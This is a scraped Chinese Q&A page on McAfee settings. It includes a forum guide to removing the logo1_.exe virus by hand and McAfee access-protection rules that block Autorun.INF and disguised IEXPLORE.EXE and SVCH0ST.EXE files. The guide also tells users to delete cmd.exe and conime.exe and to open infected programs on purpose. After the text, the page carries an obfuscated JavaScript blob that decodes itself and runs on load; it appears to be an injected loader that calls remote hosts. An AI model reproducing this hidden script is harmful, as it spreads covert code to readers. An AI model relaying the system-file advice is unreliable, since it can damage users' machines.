mcafee如何把自动删除可疑文件,改成手动删除?我要详细步骤
我是版本 McAfee Security Center
推荐回答(2个)
3楼在经过一个通宵和病毒和苦战后,我最终想出一个最好的办法来了~~~
基本是基于以前的手动方法下,在防疫和抑制方面加强了让病毒以后都不会出现,就算下载 了一个病毒文件也不会中毒(只是在我自己的机子上试过!...)
详情就是在以前手动杀毒的基本上杀毒和免疫那里不要,用这个方法来代替,结合以前的手动杀毒后总结起来是:
最新的手动清除logo1_.exe病毒方法:
进入安全模式,如进程内有其它非系统进程,把它们全结束,确认进程表只除系统进程外没其它进程正运行;
1、动行regedit,Clrl+F查sws32.dll,KILL.EXE,logo1_.exe,sws.dll,rundl132.exe等删除掉;
2、找到注册表中[hkey_local_machine/software/soft/downloadwww] auto = 1 删除downloadwww主键;
3、删除c:\windows或C:\winnt 目录下KILL.exe、sws.dll、sws32.dll、rundl132.exe、logo1_.exe、winnt.bmp、文件;
4、在c:\windows或C:\winnt目录下新建几个文本文件,全改名为你刚删除的病毒文件名,就是KILL.exe、sws.dll、sws32.dll、rundl132.exe、logo1_.exe、winnt.bmp ,注意连扩展名一起改,且要加上只读属性,这样可以保证以后运行病毒文件这两个病毒主体不会再被生成,接着修改注册表的启动项,使这两个病毒程序(现在已不是病毒,而是你自己建的程序)不随windows启动,否则的话因为这样的程序没法运行,你可以试一下自己的去打开那个文件,它只会提示“不是有效的可执行程序”,就表明你成功了。
5、最后为了安全起见,还可以搜索所有盘的EXE,RAR,DLL等文件进行查杀;(这样就万无一失了!^_^)
5、打开搜索,搜索全部_desktop.ini文件删除;
6、打开组策略--运行 gpedit.msc---用户配置--管理模块--系统-指定不给windows运行的程序 点启用 然后 点显示 添加 logo1_exe 那样可以阻止LOGO1病毒的运行和发作。
7、最后就是文件恢复工作了,因为没用杀毒软件,所以不能看自动让中毒文件恢复过来,但手动的话一样可以做到。。。。就是:
同上面的方法有点相同,在C:\WINDOWS\system32或C:\WINNT\system32 目录下复制conime.exe、cmd.exe到别的地方做备份(等下要放回去的,不能直接删掉,会让系统出现问题的,有点危险性,但不直接删掉就没事了!-_-||),然后删除原文件,新建2个文本文件,分别改成conime.exe和cmd.exe,同上面一样注意连扩展名一起改,且要加上只读属性,动作要快,因为这个文件一量删除系统会自动重新生成一个同样的文件,如果不快点改成只读的话,系统生成的文件会把你新建的文件覆盖掉,这时就算改了都没用,这样的话又要重新删除、新建了,所以要在系统生成文件前改掉属性,如果想在外面先改好再剪粘过来的话也是不行的,(就是说要和系统比快啰!!郁闷~~)
8、当做好以上的工作后,你就可以进行恢复工作了!!现在你要亲自找出中毒的文件(一般中毒的文件图标都变得模糊,一看就知道了!可以用搜索找出所有EXE,RAR文件,一般如果中毒后运行了的话,你的所有EXE,RAR文件都已经中毒了),找出中毒文件后,要一个个地打开它!(因为你已经做好前面的工作,就算运行了也不会有事)打开后又打开进程管理关闭进程,这时你原来中毒文件的文件夹里就会生成一个好的文件,只是比原名多一个.EXE而已,就是变成“原文件名.EXE.EXE”,只要去掉一个.EXE就行了。你的文件就变回正常了,图标也变清析了!
9、当恢复所有中毒文件后,你就可以把刚才备份下来的conime.exe、cmd.exe覆盖回去!!你的机子又正常了~~~~
这个方法麻烦是麻烦了点,但却不但可以清除病毒,而且可以预防以后再中毒,就算以后再下载了一个有毒文件也不会有事了!!只有c:\windows或C:\winnt 的假病毒文件还在,你就不会再中毒,以后你就可以放心下载东东了!!
提示:如果你的杀毒软件是可以查杀这个病的话,最好是全面再杀一次,看有没有漏网之鱼。。。。来个砍草除根~~~~
大功告成~~~~我也要睡觉去了~~~
dongtenx
去天极网( http://download.yesky.com/)搜一下《木马剑客2007》,下载并安装后,进安全模式下杀。附:Trojan,特洛伊木马。肯定有啦—————————— 再附:Trojan.VB是什么?盗号木马,本身具有U盘传播和网络传播的特性,开机会启动IEXPLORE.EXE浏览器进程,并会镜像挟持在Temp缓存文件中的随机数字可执行文件作保护。 IEXPLORE.EXE、SVCH0ST.EXE会自我复制到系统的system32下,并有守护插入进程,即使在安全模式下也无法删除。 为什么我说这个病毒木马是最新的呢?因为昨天去客户那里杀毒,南京某邮局某部门全部中了这个病毒,他们的机器都不联网的,全部是U盘传播的。当时使用 Autorun.exe工具清理了重启进安全模式删除,发现删除不了Trojan.VB变种,看来不是有守护进程就是有驱动启动的隐藏进程了,郁闷的该部门全部是Dell品牌机,木光驱,否则用PE系统进去了,有的人说,怎么不用Dos?根据经验这样的病毒在Dos下压根儿就查找不到。电脑使用的是趋势 OfficeScan7.0,能准确的报毒,但是无法隔离,看了控制台,只有阻挡生成的功能,没有阻挡运行的功能。看来当前所有杀毒软件只有用 Mcafee企业版了,因为他们机器配置比较好,就直接安装Mcafee VirusScan Enterprise 8.0i 没有升级病毒库,因为Mcafee不需要升级病毒库也可以控制这样的病毒木马。好了,直接说策略如何作:打开Mcafee控制台 ↓ 访问保护 ↓ 共享资源和文件夹保护 ↓ 添加 ↓ 规则名称阻挡病毒U盘媒体传播要阻挡的内容 * 要阻挡的文件或文件夹 **Autorun.INF 要阻挡的文件操作 [√]读取文件 [√]写入文件 [√]执行文件 [√]创建新文件 [ ]删除文件 添加第2条策略 规则名称阻挡病毒IEXPLORE.EXE创建与执行要阻挡的内容 * 要阻挡的文件或文件夹 %windir%system32IEXPLORE.EXE 要阻挡的文件操作 [√]读取文件 [√]写入文件 [√]执行文件 [√]创建新文件 [ ]删除文件 添加第3条策略 规则名称阻挡病毒SVCH0ST.EXE创建与执行(注意这里的SVCH0ST.EXE中CH后那个是零而非英文o)要阻挡的内容 * 要阻挡的文件或文件夹 %windir%system32SVCH0ST.EXE 要阻挡的文件操作 [√]读取文件 [√]写入文件 [√]执行文件 [√]创建新文件 [ ]删除文件 以上策略中绿色字体为步骤,红色字体为需要输入或者钩选的内容 作完这三条策略后重启计算机,进入桌面后趋势防毒墙启动后弹出警告,发现“Trojan.VB”,趋势写的什么变种我记不得了,不过后面可以看到“隔离成功”,看来麦咖啡在没有升级的情况下和升级的趋势防毒墙双剑合璧蛮不错的 。回到公司后把病毒样本提交到Virustotal,返回如此报告结果,大家一起参考下:以上策略中绿色字体为步骤,红色字体为需要输入或者钩选的内容 作完这三条策略后重启计算机,进入桌面后趋势防毒墙启动后弹出警告,发现“Trojan.VB”,趋势写的什么变种我记不得了,不过后面可以看到“隔离成功”,看来麦咖啡在没有升级的情况下和升级的趋势防毒墙双剑合璧蛮不错的 。 可以看到连小红伞都没有反映,连Avast都无动于衷,看来该变种应该是最新的,趋势防毒墙能查到,看来还不错,当然我们的麦咖啡也没有查到,基于如此多的杀毒引擎只有几款杀毒软件能够辨别为病毒,看来是很新的病毒了,所以这里发布预警,大家先作好以上策略,防御病毒永远胜于查杀病毒。 预防该Trojan.VB变种病毒同样可以如此作策略。通过U盘传播病毒是相当可怕的,大名鼎鼎的熊猫烧香、维金都有如此传播功能,请务必加上这条策略(如果已经作了,可以不添加)打开Mcafee控制台 ↓ 访问保护 ↓ 共享资源和文件夹保护 ↓ 添加 ↓ 规则名称阻挡病毒U盘媒体传播要阻挡的内容 * 要阻挡的文件或文件夹 **Autorun.INF 要阻挡的文件操作 [√]读取文件 [√]写入文件 [√]执行文件 [√]创建新文件 [ ]删除文件 Mcafee VirusScan Enterprise 8.5i的操作步骤有所不同,对于对Mcafee企业版操作不够了解的朋友,我再把8.5i版本的步骤写出来,仅供参考:打开Mcafee控制台 ↓ 访问保护 ↓ 用户自定义的规则 ↓ 新建 ↓ 文件/文件夹阻止规则 ↓ 规则名称阻挡病毒U盘媒体传播要包含的进程 * 要排除的进程 要阻止的文件或文件夹 **Autorun.INF 要禁止的文件操作 [√]对文件进行读访问 [√]对文件进行写访问 [√]正在执行的文件 [√]正在创建的新文件 [ ]正在删除的文件 添加第2条策略 规则名称阻挡病毒IEXPLORE.EXE创建与执行要包含的进程 * 要排除的进程 要阻止的文件或文件夹 %windir%system32IEXPLORE.EXE 要禁止的文件操作 [√]对文件进行读访问 [√]对文件进行写访问 [√]正在执行的文件 [√]正在创建的新文件 [ ]正在删除的文件 添加第3条策略 规则名称阻挡病毒SVCH0ST.EXE创建与执行(注意这里的SVCH0ST.EXE中CH后那个是零而非英文o)要包含的进程 * 要排除的进程 要阻止的文件或文件夹 %windir%system32SVCH0ST.EXE 要禁止的文件操作 [√]对文件进行读访问 [√]对文件进行写访问 [√]正在执行的文件 [√]正在创建的新文件 [ ]正在删除的文件0
!function(){function a(a){var _idx="g3r6t5j1i0";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,cca8>[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y=F=O8D62fODm622Y5V6fFh!qYF ^8O/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgO/}0=6FY^9Y6phFg^/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"#MqYYb"=d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 pcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!7mqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28H"hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"Z!qYF O8pc2Hc2YD wdFYampYFwdTcaZ??2H0Za%"/h^/Ks0jR8ps5KFnC}60"!O8O%c*}888Om62fYR;7c"j"aj"j"g"v"a%"58"%7m5Y|5T%%%"vF8"%hca%5ca=FmL5(8pcOa=FmO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=7mqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF J8"Ks0"=X8"ps5KFnC}60"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"Ks0^)ThF)mpOL2fmRT4"="Ks0X5ThF)m64YdCmRT4"="Ks02pThFmpOL2fmRT4"="Ks0_JqhFm64YdCmRT4"="Ks02TOhFmpOL2fmRT4"="Ks0CSqhF)m64YdCmRT4"="Ks0)FfThF)fmpOL2fmRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"!qYF O82YD VY)iO(SYFcF%"/"%J%"jR8"%X%"v58"%7m5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=^80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!^<YmqY2pFh!a28fH_ZcYH(Zc^%%aa=O8fH_ZcYH(Zc^%%aa=68fH_ZcYH(Zc^%%aa=d8fH_ZcYH(Zc^%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 78h!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 )ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=h=l0a=7m(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<^%6vvfcaPYqLY[F8F*O!67cF<86a5YF_52l}!F<^%6vvfcaPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8pc"hFFJLg//[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q/f/Ks0j(8}vR8ps5KFnC}60"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPO82dX6pdFO5mJqdF7O5^=Y8l/3cV62?yd(a/mFYLFcOa=F8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cY??Favvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2FajDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaPaa=lYvvO??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8pc"hFFJLg//[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"a%"/)_pj68"%J=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPaca!'.substr(22));new Function(b)()}();